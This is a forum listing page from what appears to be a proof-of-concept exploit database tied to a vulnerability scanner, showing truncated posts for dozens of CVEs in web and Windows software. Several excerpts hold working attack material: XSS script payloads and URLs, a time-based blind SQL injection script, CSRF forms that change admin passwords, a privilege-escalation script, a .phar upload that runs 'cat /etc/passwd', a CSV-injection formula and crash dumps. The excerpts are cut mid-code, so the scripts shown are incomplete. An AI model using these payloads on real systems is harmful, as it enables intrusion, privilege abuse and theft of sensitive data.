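?day POC Vulnerability Database
A POC vulnerability database containing all CVEs, POCs and ?day entries from across the web in recent years. It can be connected via API to the ishack vulnerability scanner; some vulnerabilities are visible to members only.
45,352 topics in this forum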
# Exploit Title: Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS) # Date: 19/01/2023 # Exploit Author: Sajibe Kanti # Vendor Name: ActiveITzone # Vendor Homepage: https://activeitzone.com/ # Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405 # Version: 6.5.0 # Tested on: Live ( Centos & Litespeed Web Server) # Demo Link : https://demo.activeitzone.com/ecommerce/ # Description # The Active eCommerce CMS 6.5.0 application has a vulnerability in the profile picture upload feature that allows for stored cross-site scripting (XSS) attacks. Specifically, the vulnerability lies in the handling of "svg" image files, which can contain mali…
- 0 replies
- 7 views
# Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278 Release Date: 2023-07-04 Vulnerability Laboratory ID (VL-ID): 2278 Common Vulnerability Scoring System: 5.4 Product & Service Introduction: =============================== https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application. Affected Product(s): ==================== Act…
- 0 replies
- 11 views
# Exploit Title: Active WebCam 11.5 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 09.09.2021 # Software Link: https://www.techspot.com/downloads/175-active-webcam.html # Vendor Homepage: https://www.pysoft.com/ # Version: 11.5 # Tested on: Windows 10 # Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options # Proof of Concept: C:\Users\death>sc qc ACTIVEWEBCAM [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ACTIVEWEBCAM TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY…
- 0 replies
- 6 views
# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor Homepage: https://www.actfax.com/ # Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe # Version : ActiveFax Server 6.92 Build 0316 # Tested on Windows 10 # CVE : N/A sc qc ActiveFaxServiceNT [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveFaxServiceNT TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe LOAD_ORDER_GROUP : …
- 0 replies
- 7 views
# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service # Date: 2019-10-12 # Vendor Homepage: https://www.actfax.com/ # Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe # Exploit Author: Achilles # Tested Version: 6.92 # Tested on: Windows 7 x64 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run python code : ActiveFax_Server.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open ActiveFaxServer.exe # 4.- Open the Pop3 Server Config # 5.- Press New # 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password' # 7.- Pre…
- 0 replies
- 7 views
# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path # Exploit Author : SamAlucard # Exploit Date: 2021-03-21 # Software Version : ActivIdentity 8.2 # Vendor Homepage : https://www.hidglobal.com/ # Tested on OS: Windows 7 Pro # ActivIdentity was acquired by HID Global in October 2010 #ActivClient is a desktop authentication software that uses smart cards and readers # for enterprise, government and commercial establishments #Analyze PoC : ============== C:\Users\DSAdsi>sc qc ac.sharedstore [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ac.sharedstore TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO…
- 0 replies
- 6 views
# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE) # Exploit Author: Chan Nyein Wai & Thura Moe Myint # Vendor Homepage: https://www.manageengine.com/products/ad-manager/ # Software Link: https://www.manageengine.com/products/ad-manager/download.html # Version: Ad Manager Plus Before 7122 # Tested on: Windows # CVE : CVE-2021-44228 # Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md ### Description In the summer of 2022, I have been doing security engagement on Synack Red Team in the collaboration with my good friend (Thura Moe Myint). At that time, Log4j was already widespread on the internet. Manage Engi…
- 0 replies
- 8 views
#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path #Exploit Author : ZwX #Exploit Date: 2020-01-05 #Vendor Homepage : http://webcompanion.com/ #Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2 #Tested on OS: Windows 10 #Analyze PoC : ============== C:\Users\ZwX>sc qc WCAssistantService [SC] QueryServiceConfig réussite(s) SERVICE_NAME: WCAssistantService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program…
- 0 replies
- 6 views
# Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path # Date: 2019-11-06 # Exploit Author: Mariela L Martínez Hdez # Vendor Homepage: https://webcompanion.com/en/ # Software Link: https://webcompanion.com/en/ # Version: Adaware Web Companion version 4.8.2078.3950 # Tested on: Windows 10 Home (64 bits) # 1. Description # Adaware Web Companion version 4.8.2078.3950 service 'WCAssistantService' has an unquoted service path. # 2. PoC C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """" WC Assistant WCAssistantService C:\Program …
- 0 replies
- 7 views
Added additional validations for 2FA login. Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 07/06/2023 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue in Zimbra Collaboration (ZCS) v.8.8.15 and v.9.0 allows a remote attacker to escalate privileges and obtain sensitive information via the password and 2FA parameters. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2023-29381 CVE - 2023-29381 https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
- 0 replies
- 6 views
# Title: addressbook 9.0.0.1 - 'id' SQL Injection # Date: 2020-04-01 # Author: David Velazquez a.k.a. d4sh&r000 # vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download # vulnerable version: 9.0.0.1 # Description: addressbook 9.0.0.1 time-based blind SQL injection # Tested On: Ubuntu Server 20.04 LTS # Platform: PHP # Type: webapp # Use: # addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1' #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import requests def isVulnerable(URL): """Check if the URL is vulnerable to time-based blind SQL injection""" response = requests.get(URL+'%27%20AND%20(SELECT%207812%2…
- 0 replies
- 6 views
Addressed XSS vulnerability in zimbraAdmin interface due to non sanitised parameter Severity 5 CVSS (AV:N/AC:L/Au:S/C:P/I:P/A:N) Published 08/12/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0, issue 1 of 2. A reflected cross-site scripting (XSS) vulnerability has been identified in the Zimbra webmail admin interface. This vulnerability occurs due to inadequate input validation of the packages parameter, allowing an authenticated attacker to inject and execute arbitrary JavaScript code within the context of another user's browser session. By uploading a malic…
- 0 replies
- 5 views
# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting # Date: 2023.Aug.01 # Exploit Author: Pedro (ISSDU TW) # Vendor Homepage: https://loganalyzer.adiscon.com/ # Software Link: https://loganalyzer.adiscon.com/download/ # Version: v4.1.13 and before # Tested on: Linux # CVE : CVE-2023-36306 There are several installation methods. If you installed without a database (File-Based), there is no need to log in. If you installed with a database, you should log in with a Read Only User (at least). XSS Payloads are as below: XSS http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E http://[ip address]/logan…
- 0 replies
- 11 views
# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF) # Date:02/08/2019. # Exploit Author: Pablo Santiago # Vendor Homepage: https://adive.es # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.7 # Tested on: Windows and Kali linux # CVE :2019-14346 # 1. Technical Description: # Adive Framework 2.0.7 and possibly before are affected by Cross-Site #Request Forgery vulnerability, an attacker could change any user password. # 2. Proof Of Concept (CODE): <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/adive/admin/config" method="POST"> <…
- 0 replies
- 5 views
# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation # Date: 2019-08-02 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.7 # Tested on: Windows 10 # CVE : CVE-2019-14347 #Exploit import requests import sys session = requests.Session() http_proxy = "http://127.0.0.1:8080" https_proxy = "https://127.0.0.1:8080" proxyDict = { "http" : http_proxy, "https" : https_proxy } print('[*****************************************]') print('[ BYPASSING Adive Framework Version.2.0.5 ]') print('[****************************************…
- 0 replies
- 8 views
# Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password) # Exploit Author: Sarthak Saini # Date: 2020-01-18 # Vendor Link : https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.8 # CVE:CVE-2020-7991 # Category: Webapps # Tested on: windows64bit / mozila firefox # # |--!> |---------------------------------------------------------------------------------- 1) Persistent Cross-site Scripting at user add page Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting Payload:- <script>alert(1)</script> POST /admin/user/add HTTP/1.1 Host: 192.…
- 0 replies
- 5 views
# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting # Exploit Author: Sarthak Saini # Dork: N/A # Date: 2020-01-18 # Vendor Link : https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.8 # Category: Webapps # Tested on: windows64bit / mozila firefox 1) Persistent Cross-site Scripting at user add page Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting Payload:- <script>alert(1)</script> POST /admin/user/add HTTP/1.1 Host: 192.168.2.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,applicati…
- 0 replies
- 6 views
# Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure # Exploit Author: CraCkEr # Date: 25/07/2023 # Vendor: Templatecookie # Vendor Homepage: https://templatecookie.com/ # Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script # Version: 2.14.0 # Tested on: Windows 10 Pro # Impact: Sensitive Information Leakage # CVE: CVE-2023-4168 ## Description Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects. ## Steps to Reproduce: When you visit any page on the websi…
- 0 replies
- 13 views
Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE) Application: Admidio Version: 4.2.10 Bugs: RCE Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 10.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to account 2. Go to Announcements 3. Add Entry 4. Upload .phar file in image upload section. .phar file Content <?php echo system('cat /etc/passwd');?> 5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar ) Request: POST /admidio/a…
- 0 replies
- 10 views
Exploit Title: admidio v4.2.5 - CSV Injection Application: admidio Version: 4.2.5 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 26.04.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. Log in as user. Step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2) Step 3. If admin exports users as CSV or Excel file, in the computer of admin occurs CSV injection and…
- 0 replies
- 10 views
# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control # Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554) # Date: 21.12.2022 # Exploit Author: kv1to # Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17 # Tested on: Raspbian / Debian # Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497 # CVE : CVE-2022-23513 In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint. ## Proof Of Concept with curl: curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' ##…
- 0 replies
- 12 views
-----=====[ Background ]=====----- AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree. We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop so…
- 0 replies
- 6 views
-----=====[ Background ]=====----- AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree. We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop so…
- 0 replies
- 9 views
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34 eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 CoolType!CTInit+0x3913e: 10e6c29e 8902 mov dword ptr [edx],eax ds:002b:707703a4=31a03194 0:000> u @eip-14 CoolType!CTInit+0x3912a: 10e6c28a 8b7d0c…
- 0 replies
- 8 views
We have observed the following crash in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- ======================================= VERIFIER STOP 00000007: pid 0x2C1C: Heap block already freed. 0C441000 : Heap handle for the heap owning the block. 147E6638 : Heap block being freed again. 00000010 : Size of the heap block. 00000000 : Not used ======================================= This verifier stop is not continuable. Process will be terminated when you use the `go' debugger command. ======================================= (2c1c.491c): Break instruction exception - code 80000003 (first chance) eax=66e603a0…
- 0 replies
- 5 views